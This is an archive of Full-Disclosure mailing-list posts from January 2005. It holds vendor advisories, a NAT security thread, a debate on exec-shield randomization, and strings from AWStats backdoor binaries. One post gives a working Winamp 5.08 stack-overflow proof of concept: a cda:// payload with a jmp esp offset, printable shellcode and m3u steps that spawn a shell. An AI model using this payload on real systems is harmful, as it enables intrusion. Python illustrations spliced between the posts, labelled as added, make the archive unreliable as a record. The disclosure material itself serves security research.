 0e2280ac393ca059ae4d19b3db8289ee 10.0/RPMS/evolution-devel-1.4.6-5.1.100mdk.i586.rpm
 6d1f2aa61768f1cebeeb5454abbc4a67 10.0/RPMS/evolution-pilot-1.4.6-5.1.100mdk.i586.rpm
 cc0058793a3353fd9d420da898e42213 10.0/SRPMS/evolution-1.4.6-5.1.100mdk.src.rpm

 Mandrakelinux 10.0/AMD64:
 2cbb561ccbd6a2a30c4830e4bdae4c17 amd64/10.0/RPMS/evolution-1.4.6-5.1.100mdk.amd64.rpm
 35673a1c5f7c595930def4776bfeba12 amd64/10.0/RPMS/evolution-devel-1.4.6-5.1.100mdk.amd64.rpm
 091ef5247fce276a0c8fffd3efd2d967 amd64/10.0/RPMS/evolution-pilot-1.4.6-5.1.100mdk.amd64.rpm
 cc0058793a3353fd9d420da898e42213 amd64/10.0/SRPMS/evolution-1.4.6-5.1.100mdk.src.rpm

 Mandrakelinux 10.1:
 0b3320cd8f1209071dbb38de3f5f4c62 10.1/RPMS/evolution-2.0.3-1.2.101mdk.i586.rpm
 d7cf293651f49ef222da230f4ad3cb2d 10.1/RPMS/evolution-devel-2.0.3-1.2.101mdk.i586.rpm
 89f0d1b662517cb0756eec458cd6c234 10.1/RPMS/evolution-pilot-2.0.3-1.2.101mdk.i586.rpm
 ee51751a3cabf18e53bd1e3092da3223 10.1/SRPMS/evolution-2.0.3-1.2.101mdk.src.rpm

 Mandrakelinux 10.1/X86_64:
 984eae27bc6fbebcf32002ba61b17670 x86_64/10.1/RPMS/evolution-2.0.3-1.2.101mdk.x86_64.rpm
 8bc7680f0095b4153a882716f8485daf x86_64/10.1/RPMS/evolution-devel-2.0.3-1.2.101mdk.x86_64.rpm
 3db68c56395c13a3fe458645bb1c9975 x86_64/10.1/RPMS/evolution-pilot-2.0.3-1.2.101mdk.x86_64.rpm
 ee51751a3cabf18e53bd1e3092da3223 x86_64/10.1/SRPMS/evolution-2.0.3-1.2.101mdk.src.rpm

 Corporate Server 3.0:
 6a8867e05261d45f89ff09e9cb05ff31 corporate/3.0/RPMS/evolution-1.4.6-5.1.C30mdk.i586.rpm
 a9a7a5c41a121178a2fffbff6a8764a3 corporate/3.0/RPMS/evolution-devel-1.4.6-5.1.C30mdk.i586.rpm
 4d6f9b339eb9cc545e9b562d8223fca8 corporate/3.0/RPMS/evolution-pilot-1.4.6-5.1.C30mdk.i586.rpm
 854f366f4a1c868e905888a46d06603a corporate/3.0/SRPMS/evolution-1.4.6-5.1.C30mdk.src.rpm

 Corporate Server 3.0/x86_64:
 194f59a32369684d6642067924937dcd x86_64/corporate/3.0/RPMS/evolution-1.4.6-5.1.C30mdk.x86_64.rpm
 79de9373078067bc09779afb01b2a2f1 x86_64/corporate/3.0/RPMS/evolution-devel-1.4.6-5.1.C30mdk.x86_64.rpm
 a050fc93565161d237e141feb014c9f1 x86_64/corporate/3.0/RPMS/evolution-pilot-1.4.6-5.1.C30mdk.x86_64.rpm
 854f366f4a1c868e905888a46d06603a x86_64/corporate/3.0/SRPMS/evolution-1.4.6-5.1.C30mdk.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrakeUpdate or urpmi. The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandrakesoft for security. You can obtain
 the GPG public key of the Mandrakelinux Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandrakelinux at:

  http://www.mandrakesoft.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_linux-mandrake.com

 Type Bits/KeyID Date User ID
 pub 1024D/22458A98 2000-07-10 Linux Mandrake Security Team
  <security linux-mandrake.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFB+Wk0mqjQ0CJFipgRAsk3AKDL8HPSAwU/LNO2IDfsibj9wi1cdgCgzU63
/VJIUnKfHjOigzKL4Kcg5/Q=
=MPF+
-----END PGP SIGNATURE-----


 
Re: [Full-Disclosure] Re: [ GLSA 200501-36 ] AWStats: Remote code execution

From: morning_wood (se_cur_ityhotmail.com)
Date: Wed Jan 26 2005 - 21:16:28 CST


> I don't have the time to investigate the "cgi" and "dc" binaries.
> The "cgi" at least tries to daemonize and opens a TCP listening socket.
> They also try to replace the index page on the vulnerable site.

cgi
00001495 00001495 0 /dev/tty
0000149E 0000149E 0 socket
000014AA 000014AA 0 listen
000014C0 000014C0 0 PsychoPhobia Backdoor is starting...

0000254E 0000254E 0 init.c

dc
000009C0 000009C0 0 Welcome to Data Cha0s Connect Back Shell
000009E9 000009E9 0 No More Damn Issue Commands
00000A20 00000A20 0 Data Cha0s Connect Back Backdoor
00000A42 00000A42 0 /bin/sh
00000A4D 00000A4D 0 XTERM=xterm
00000A59 00000A59 0 HISTFILE=
00000A63 00000A63 0 SAVEHIST=
00000A6D 00000A6D 0 Usage: %s [Host] <port>
00000A86 00000A86 0 [*] Dumping Arguments
00000A9C 00000A9C 0 [*] Resolving Host Name
00000AB4 00000AB4 0 [*] Connecting...
00000AC6 00000AC6 0 [*] Spawning Shell
00000AD9 00000AD9 0 [*] Detached

00004321 00004321 0 dc-connectback.c

cheers,
m.w



 
[Full-Disclosure] [OpenPKG-SA-2005.004] OpenPKG Security Advisory (sasl)

From: OpenPKG (openpkgopenpkg.org)
Date: Fri Jan 28 2005 - 01:39:27 CST


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

________________________________________________________________________

OpenPKG Security Advisory                            The OpenPKG Project
http://www.openpkg.org/security.html                 http://www.openpkg.org
openpkg-securityopenpkg.org                          openpkgopenpkg.org
OpenPKG-SA-2005.004                                  28-Jan-2005
________________________________________________________________________

Package: sasl
Vulnerability: arbitrary code execution
OpenPKG Specific: no

Affected Releases:   Affected Packages:        Corrected Packages:
OpenPKG CURRENT      <= sasl-2.1.19-20040920   >= sasl-2.1.20-20041025
OpenPKG 2.2          <= sasl-2.1.19-2.2.0      >= sasl-2.1.19-2.2.1
OpenPKG 2.1          <= sasl-2.1.18-2.1.0      >= sasl-2.1.18-2.1.1

Affected Releases:   Dependent Packages:
OpenPKG CURRENT      imapd kolab openldap::with_sasl
                     postfix::with_sasl sendmail::with_sasl
OpenPKG 2.2          imapd kolab openldap::with_sasl
                     postfix::with_sasl sendmail::with_sasl
OpenPKG 2.1          imapd kolab openldap::with_sasl
                     postfix::with_sasl sendmail::with_sasl

Description:
  A setuid and setgid application vulnerability was found in the Cyrus
  SASL library [0]. At application startup, libsasl2 attempts to build a
  list of all available SASL plugins which are available on the system.
  To do so, the library searches for and attempts to load every shared
  library found within the plugin directory. This location can be set
  with the SASL_PATH environment variable.

  In situations where an untrusted local user can affect the environment
  of a privileged process, this behavior could be exploited to run
  arbitrary code with the privileges of a setuid or setgid application.
  The Common Vulnerabilities and Exposures (CVE) project assigned the
  identifier CAN-2004-0884 [1] to the problem.

  Please check whether you are affected by running "<prefix>/bin/openpkg
  rpm -q sasl". If you have the "sasl" package installed and its version
  is affected (see above), we recommend that you immediately upgrade it
  (see Solution) and any dependent packages as well [2][3].

Solution:
  Select the updated source RPM appropriate for your OpenPKG release
  [4][5], fetch it from the OpenPKG FTP service [6][7] or a mirror
  location, verify its integrity [8], build a corresponding binary RPM
  from it [2] and update your OpenPKG installation by applying the
  binary RPM [3]. For the most recent release OpenPKG 2.2, perform the
  following operations to permanently fix the security problem (for
  other releases adjust accordingly).

  $ ftp ftp.openpkg.org
  ftp> bin
  ftp> cd release/2.2/UPD
  ftp> get sasl-2.1.19-2.2.1.src.rpm
  ftp> bye
  $ <prefix>/bin/openpkg rpm -v --checksig sasl-2.1.19-2.2.1.src.rpm
  $ <prefix>/bin/openpkg rpm --rebuild sasl-2.1.19-2.2.1.src.rpm
  $ su -
  # <prefix>/bin/openpkg rpm -Fvh <prefix>/RPM/PKG/sasl-2.1.19-2.2.1.*.rpm

  Additionally, we recommend that you rebuild and reinstall
  any dependent packages (see above) as well [2][3].
________________________________________________________________________

References:
  [0] http://asg.web.cmu.edu/sasl/
  [1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0884
  [2] http://www.openpkg.org/tutorial.html#regular-source
  [3] http://www.openpkg.org/tutorial.html#regular-binary
  [4] ftp://ftp.openpkg.org/release/2.2/UPD/sasl-2.1.19-2.2.1.src.rpm
  [5] ftp://ftp.openpkg.org/release/2.1/UPD/sasl-2.1.18-2.1.1.src.rpm
  [6] ftp://ftp.openpkg.org/release/2.2/UPD/
  [7] ftp://ftp.openpkg.org/release/2.1/UPD/
  [8] http://www.openpkg.org/security.html#signature
________________________________________________________________________

For security reasons, this advisory was digitally signed with the
OpenPGP public key "OpenPKG <openpkgopenpkg.org>" (ID 63C4CB9F) of the
OpenPKG project which you can retrieve from http://pgp.openpkg.org and
hkp://pgp.openpkg.org. Follow the instructions on http://pgp.openpkg.org/
for details on how to verify the integrity of this advisory.
________________________________________________________________________

-----BEGIN PGP SIGNATURE-----
Comment: OpenPKG <openpkgopenpkg.org>

iD8DBQFB+ewigHWT4GPEy58RAjdyAJsFrQUG5q9DjmwiGvccEEIxU/mXbACg431X
BjzkxqCH71N5ZEMlDoGBGwU=
=kOee
-----END PGP SIGNATURE-----


 
[Full-Disclosure] NAT router inbound network traffic subversion

From: Kristian Hermansen (khermansenht-technology.com)
Date: Fri Jan 28 2005 - 00:12:19 CST


I have Googled around and asked a highly-respected Professor at my
University whether it is possible to direct packets behind a NAT router
without the internal 192.168.x.x clients first requesting a connection
to the specific host outside. The answer I received is "not possible".
I also asked if this can be thought of as a security feature, to which
the reply was again "yes".

Now, I wouldn't place all my bets on his answer and I am calling on
someone out there to clear up my question. If NAT really does only
allow inbound connections with a preliminary request as he suggests, it
seems that the only way to get an "unauthorized" packet behind the
router is by some flaw in the firmware of the device.

How about if the client has requested a connection to Google.com from
behind his Linksys home NAT router: would it be possible for an outside
attacker to spoof packets from Google's IP to get packets into the
network? Or do we need to know the sequence numbers as well? Or is
there an even more devious way to get packets on the inside without a
client's initiative?

Has there been any research into this? Are there statistics on worm
propagation and exploited network hosts in relation to those individuals
that did not own routers (and instead connected directly to their
modem)? If *all* home users on the Internet had NAT routers during the
summer of 2003, would we have significantly slowed the spread of
Blaster? I believe these all to be very important questions and the
security aspects of the ability to route packets behind NAT really
interests me...maybe some of you can elaborate :-)
--
Kristian Hermansen <khermansenht-technology.com>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQBB+dfCISAslhPnyaURAoDSAJ4y2/OfmL3uqQR6XeiabGrELtyPDQCaAiQP
Vk+Kzv3LA0jBaj5I8VmzWfg=
=AE/w
-----END PGP SIGNATURE-----


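To make the professor's "not possible" concrete, here is a minimal model of a port-translating NAT router's connection table, added as an illustration (it is not from the poster or from any router vendor). Addresses are constructed from the RFC 5737 documentation ranges. The filtering modelled is the strict common case, where an inbound packet is forwarded only if an inside host recently talked to exactly that remote address and port through that external port (address-and-port-dependent filtering in RFC 4787 terms); real devices vary, and some are looser.

```python
"""Toy NAPT (port-translating NAT) connection table. Added illustration,
not a real router's code. All addresses are constructed (RFC 5737
documentation ranges)."""
from dataclasses import dataclass


@dataclass
class Mapping:
    internal_ip: str
    internal_port: int
    remote_ip: str
    remote_port: int
    last_seen: float


class Napt:
    def __init__(self, external_ip, idle_timeout=300.0, first_port=40000):
        self.external_ip = external_ip
        self.idle_timeout = idle_timeout      # seconds before an idle mapping is dropped
        self.next_port = first_port
        self.table = {}                       # external port -> Mapping

    def outbound(self, internal_ip, internal_port, remote_ip, remote_port, now):
        """An inside host sends to the Internet: reuse or allocate an external
        port and record the whole 5-tuple. Returns (ip, port) the remote sees."""
        self._expire(now)
        for ext_port, m in self.table.items():
            if (m.internal_ip, m.internal_port, m.remote_ip, m.remote_port) == \
               (internal_ip, internal_port, remote_ip, remote_port):
                m.last_seen = now
                return self.external_ip, ext_port
        ext_port = self.next_port
        self.next_port += 1
        self.table[ext_port] = Mapping(internal_ip, internal_port, remote_ip, remote_port, now)
        return self.external_ip, ext_port

    def inbound(self, src_ip, src_port, dst_port, now):
        """A packet arrives from the Internet addressed to our external port.
        It is forwarded only if an inside host created a mapping on that
        port for exactly this remote ip:port and the mapping has not idled
        out. Otherwise there is no inside address to give it, so it is
        dropped: this is the 'no unsolicited inbound' property."""
        self._expire(now)
        m = self.table.get(dst_port)
        if m is None or (src_ip, src_port) != (m.remote_ip, m.remote_port):
            return None
        m.last_seen = now
        return m.internal_ip, m.internal_port

    def _expire(self, now):
        stale = [p for p, m in self.table.items() if now - m.last_seen > self.idle_timeout]
        for p in stale:
            del self.table[p]


if __name__ == "__main__":
    nat = Napt("203.0.113.5")
    print(nat.inbound("198.51.100.9", 445, 40000, now=0))            # None: nothing mapped
    print(nat.outbound("192.168.1.20", 51515, "198.51.100.10", 80, now=0))
    print(nat.inbound("198.51.100.10", 80, 40000, now=1))            # forwarded to the inside host
    print(nat.inbound("198.51.100.99", 80, 40000, now=1))            # None: other source address
```

What the model shows about the spoofing question: a packet carrying the peer's source address is not enough by itself; it also has to arrive on the external port the router happened to allocate, carry the peer's source port, and do so before the mapping idles out. The NAT table itself knows nothing about TCP sequence numbers; whether such a packet then means anything to the inside host is decided by that host's TCP stack (and by any stateful firewall on the router that tracks TCP state, which this toy does not).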

 
Re: [Full-Disclosure] "Advances in Security" in the Linux Kernel and RedHat idiocy

From: Brad Spengler (spendergrsecurity.net)
Date: Thu Jan 27 2005 - 13:44:51 CST


On Thu, Jan 27, 2005 at 08:37:19PM +0100, Michal Zalewski wrote:
> On Thu, 27 Jan 2005, Brad Spengler wrote:
>
> > I guess anyone who thinks that taking a hardcoded exploit and running it
> > 256 times would always result in a successful exploit is stupid.
>
> It would not always result in a successful exploitation; just as flipping
> the coin twice is not a guarantee of getting tails once.

Of course, but you get the idea. Your chances of succeeding after 256
tries are such that it is highly probable you wouldn't fail (and in
fact, if the process you're attacking is a forking daemon like apache,
if you iterate through all the possibilities, you do indeed have a 100%
chance of succeeding after 256 tries).

> Other than that, the amount of randomization is indeed puny; but then,
> even 32-bit randomization is a good defense only in certain situations,
> and often, can be defeated with some time, aided by luck or a decent
> NOP-equivalent sled.

Indeed, and only PaX/grsecurity handles these things, which is why it is
useful in our case. However, attempting to use weak randomization as
RedHat is trying is nothing more than trivial obfuscation, which should
have no place in the kernel. All it does is give people a false sense
of security, and allow RedHat to make claims that they're preventing
75% of exploits with Exec-shield (of course ignoring that all such
exploits that failed could be easily rewritten to succeed). Things
have really taken a turn for the worse: Linus used to be against having
only a non-executable stack because it's trivially evaded. Now he's
all for something that is even more obfuscation than having only a
non-executable stack: the exploits don't even have to be rewritten in
this case. This all reeks of security ignorance and politics.

-Brad


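Putting numbers on the 256-tries argument above, as an added example that is not part of the thread: with b bits of randomization, an attacker who faces a fresh random layout on every attempt succeeds within t tries with probability 1 - (1 - 2^-b)^t, whereas against a forking daemon whose children all inherit one layout an exhaustive walk of the 2^b candidates is guaranteed to hit. The script also computes the width needed to keep the success probability under a chosen bound, which is the defender's sizing question.

```python
"""Success probability of guessing a randomized address (added example).

Two attacker models from the thread:
  * fresh layout per attempt (the service re-executes after each crash):
    every try is an independent 1-in-2**bits guess;
  * forking daemon (Apache-style): every child inherits the parent's
    layout, so the attacker can enumerate the 2**bits candidates without
    repeating one and is certain to hit within 2**bits tries.
"""


def p_success_independent(bits: int, tries: int) -> float:
    """P(at least one hit in `tries` independent guesses over 2**bits values)."""
    if bits < 0 or tries < 0:
        raise ValueError("bits and tries must be non-negative")
    p_miss = 1.0 - 2.0 ** -bits          # probability a single guess misses
    return 1.0 - p_miss ** tries          # 1 - P(all tries miss)


def p_success_enumeration(bits: int, tries: int) -> float:
    """P(hit within `tries` attempts) when the layout is fixed across attempts
    and the attacker walks the 2**bits candidates without repeating one."""
    if bits < 0 or tries < 0:
        raise ValueError("bits and tries must be non-negative")
    return min(1.0, tries / 2 ** bits)   # linear until every candidate is used


def bits_needed(tries: int, max_p: float) -> int:
    """Smallest randomization width (bits) such that an attacker allowed
    `tries` independent attempts succeeds with probability <= max_p."""
    if not 0.0 < max_p < 1.0:
        raise ValueError("max_p must be in (0, 1)")
    bits = 0
    while p_success_independent(bits, tries) > max_p:
        bits += 1
    return bits


if __name__ == "__main__":
    # 8 bits is the width discussed in the thread; 16 and 24 shown for scale.
    for b in (8, 16, 24):
        print(f"{b:2d} bits, 256 tries: independent={p_success_independent(b, 256):.4f}"
              f"  enumeration={p_success_enumeration(b, 256):.4f}")
    print("bits for P(success in 256 tries) <= 0.1%:", bits_needed(256, 1e-3))
```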

 
[Full-Disclosure] Sify: ISP in India using hubs to provide connectivity

rohitkritikalsolutions.com
Date: Thu Jan 27 2005 - 22:56:41 CST


hi,
 This one is the most obvious problem; I am nevertheless reporting it
since the ISP concerned has refused to take any action.

Sify (www.sify.com/bbhome) is an ISP in India with the second-largest customer
base and the largest among broadband users. To provide broadband, they install
a radio link near your place and then provide connectivity to many users
via a HUB, not even a switch! The problem is obvious. I can listen to
anyone's conversation and do anything at all, using stuff like dnsspoof
and the likes. To top it all, they refuse to acknowledge that this is a
problem and warn that "in case you run sniffers on our network, we will
prosecute you!" As if everyone who sniffs traffic is going to tell them.
In a place like India, where people are still on Windows 98, the scope of a
major virus attack becomes manifold in such situations.
Thanks
Rohit


 
Re: [Full-Disclosure] NAT router inbound network traffic subversion

From: morning_wood (se_cur_ityhotmail.com)
Date: Fri Jan 28 2005 - 05:32:20 CST


scenario...

NAT client browses web...
NAT client initiates an HTTP request to do this...
ROUTER returns the request to NAT client...
( normal activity )

attacker website exploits client browser...
exploit drops and executes "badfile.exe"
"badfile.exe" hooks iexplore.exe...

"badfile.exe" is 'reverse connecting trojan'...
"badfile.exe" initiates a HTTP request to do this...
attacker's "badfile.exe" 'client' is waiting with an HTTP server...

the new hooked browser initiates a HTTP request to the attacker.
NAT client is now connected to the attacker
through the ROUTER ( kinda like browsing the web huh? )
attacker now has unrestricted packet access via the NAT client,
that is where ??? BEHIND YOUR ROUTER

attacker now can do as he wishes to the rest of your network
( GAME OVER )

Cheers,
m.w


 
[Full-Disclosure] Winamp Exploit (POC) 5.08 Stack Overflow

From: Rojodos (rojo2_bugtraqyahoo.es)
Date: Fri Jan 28 2005 - 06:22:55 CST


Hello :)

I've coded an exploit for this vulnerability, using the advisory "NSFOCUS SA2005-01 : Buffer Overflow in WinAMP in_cdda.dll CDA Device Name" as a guide. The advisory is very good, so it's very easy to code the exploit.

This code:

cda://AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHnT _IJJJ3WEcEmEdE.EeExEeDwP]S

Should spawn a shell on WinXP SP1 with Winamp 5.08. I have used as offset 0x5f20546e in olepro32.dll, a "jmp esp" (nT _)

3WEcEmEdE.EeExEeDwP]S is the scode in "printable" chars.

I wrote the scode some time ago, at http://foro.elhacker.net. It's a very, very simple scode, with a hardcoded system() call (I'm a noob, sorry xD)

I have used AAAABBBBCCCC... to see how big the buffer is, and to see where the ret is overflowed (in 5.08, exactly at HIII)

In Winamp 5.05 the same code works, but the ret is at "IIII", so the exploit must have another "H":

 cda://AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHnT _IJJJ3WEcEmEdE.EeExEeDwP]S

Then the exploit works fine in Winamp 5.05 and spawns a shell :)

I have only tested it on 5.08 and 5.05, but I think that it's easy to "port" the exploit to other versions.

These codes can be saved in an m3u file (a Winamp playlist file).

If you copy these codes into a text file like this (Winamp 5.08):

#EXTM3U
#EXTINF:5,DJ Mike Llama - Llama Whippin' Intro
cda://AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHnT _IJJJ3WEcEmEdE.EeExEeDwP]S

(for example, I have used the "demo" file, DJ Mike Llama, and edited the PLAYLIST ENTRY)

And save it as a *.m3u file; if you open this (in this case, I repeat, with Winamp 5.08), a cmd shell will appear :)

It's trivial to change the shellcode to make a bindport, reverse shell, etc.

Sorry about my bad English, I'm Spanish :) (Spain exists :D)

Greets to http://www.elhacker.net and http://foro.elhacker.net and all the people I know, especially "her" (Isthar) :)

THE REAL ELHACKER.NET! :D

Best regards.

Rojodos

rojo2_bugtraqyahoo.es
2005-01-28



 
Re: [Full-Disclosure] NAT router inbound network traffic subversion

From: Joe (joejretrading.com)
Date: Fri Jan 28 2005 - 06:42:28 CST


In message <1106892739.9371.26.camellocalhost.localdomain>, Kristian
Hermansen <khermansenht-technology.com> writes
>I have Googled around and asked a highly-respected Professor at my
>University whether it is possible to direct packets behind a NAT router
>without the internal 192.168.x.x clients first requesting a connection
>to the specific host outside. The answer I received is "not possible".
>I also asked if this can be thought of as a security feature, to which
>the reply was again "yes".

Yes. But see later.
>
>Now, I wouldn't place all my bets on his answer and I am calling on
>someone out there to clear up my question. If NAT really does only
>allow inbound connections with a preliminary request as he suggests, it
>seems that the only way to get an "unauthorized" packet behind the
>router is by some flaw in the firmware of the device.

If you are not offering any services to the Internet, yes. If you are,
then you have ports open on the router, redirecting to real machines,
which may be running software which can be exploited. This is how worms
spread. The home user is unlikely to be hit by a worm, unless they are
running a Windows NT-derived operating system, such as XP, without a
firewall and/or NAT device. Commercial installations such as web servers
are the main targets for worms.
>
>How about if the client has requested a connection to Google.com from
>behind his Linksys home NAT router: would it be possible for an outside
>attacker to spoof packets from Google's IP to get packets into the
>network? Or do we need to know the sequence numbers as well? Or is
>there an even more devious way to get packets on the inside without a
>client's initiative?

Google for "man in the middle" attack.
>
>Has there been any research into this? Are there statistics on worm
>propagation and exploited network hosts in relation to those individuals
>that did not own routers (and instead connected directly to their
>modem)? If *all* home users on the Internet had NAT routers during the
>summer of 2003, would we have significantly slowed the spread of
>Blaster? I believe these all to be very important questions and the
>security aspects of the ability to route packets behind NAT really
>interests me...maybe some of you can elaborate :-)

Worms are not usually an issue for home users, except when someone sells
an operating system with ports open to the Internet by default. XP
pre-service pack 2 is such an operating system. Its users were duly
hammered by worms, and would not have been if they used the built-in
firewall, which was not enabled by default. I'm not sure how much a NAT
device would have helped on its own. Modern versions of Windows are
extremely talkative, and it may well have invited the bad guys in of its
own accord. But widespread use of the firewall would have stopped it.

More troublesome for home users are viruses spread by email, which
initiate connections through the firewall, router or other device from
the inside. The security device cannot generally tell whether the user
or a virus has made the request, though third-party 'personal' firewalls,
running on the user's workstation, are becoming quite good at this.

I don't think Internet Explorer currently runs any code in an incoming
email automatically, as it once did, but it's not hard to persuade many
users to click on a button and run the virus themselves. Most viruses
are now also worms; they will attempt to spread both by email and by
direct contact with unprotected machines.
--
Joe


 
 
[Full-Disclosure] [gentoo-announce] [ GLSA 200501-39 ] SquirrelMail: Multiple vulnerabilities

From: Sune Kloppenborg Jeppesen (jaervoszgentoo.org)
Date: Fri Jan 28 2005 - 08:46:32 CST


- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200501-39
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: SquirrelMail: Multiple vulnerabilities
      Date: January 28, 2005
      Bugs: #78116
        ID: 200501-39

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

SquirrelMail fails to properly sanitize user input, which could lead to
arbitrary code execution and compromise webmail accounts.

Background
==========

SquirrelMail is a webmail package written in PHP. It supports IMAP and
SMTP and can optionally be installed with SQL support.

Affected packages
=================

    -------------------------------------------------------------------
     Package / Vulnerable / Unaffected
    -------------------------------------------------------------------
  1 mail-client/squirrelmail <= 1.4.3a-r2 >= 1.4.4

Description
===========

SquirrelMail fails to properly sanitize certain strings when decoding
specially-crafted strings, which can lead to PHP file inclusion and
XSS.

* Insufficient checking of incoming URLs in prefs.php (CAN-2005-0075)
  and in webmail.php (CAN-2005-0103).

* Insufficient escaping of integers in webmail.php (CAN-2005-0104).

Impact
======

By sending a specially-crafted URL, an attacker can execute arbitrary
code from the local system with the permissions of the web server.
Furthermore, by enticing a user to load a specially-crafted URL, it is
possible to display arbitrary remote web pages in SquirrelMail's
frameset and execute arbitrary scripts running in the context of the
victim's browser. This could lead to a compromise of the user's webmail
account, cookie theft, etc.

Workaround
==========

The arbitrary code execution is only possible with "register_globals"
set to "On". Gentoo ships PHP with "register_globals" set to "Off" by
default. There are no known workarounds for the other issues at this
time.

Resolution
==========

All SquirrelMail users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=mail-client/squirrelmail-1.4.4"

Note: Users with the vhosts USE flag set should manually use
webapp-config to finalize the update.

References
==========

  [ 1 ] SquirrelMail Advisory
        http://sourceforge.net/mailarchive/message.php?msg_id=10628451
  [ 2 ] CAN-2005-0075
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0075
  [ 3 ] CAN-2005-0103
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0103
  [ 4 ] CAN-2005-0104
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0104

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200501-39.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
securitygentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2005 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0



 
 
[Full-Disclosure] [ Positive Technologies ] Defeating Microsoft Windows XP SP2 Heap protection

aanisimovptsecurity.ru
Date: Fri Jan 28 2005 - 08:41:17 CST


It was discovered by the MaxPatrol team that it is possible to defeat the Microsoft Windows XP SP2 Heap protection and Data Execution Prevention mechanisms.

As a result, it is possible to implement:
- Arbitrary memory region write access (smaller or equal to 1016 bytes);
- Arbitrary code execution;
- DEP bypass.

Details are described in the article:

http://www.maxpatrol.com/ptmshorp.asp

--
Best regards,
 aanisimov mailto:aanisimovptsecurity.ru



 
[Full-Disclosure] Update

From: Bugzilla (bugzillaredhat.com)
Date: Fri Jan 28 2005 - 09:48:14 CST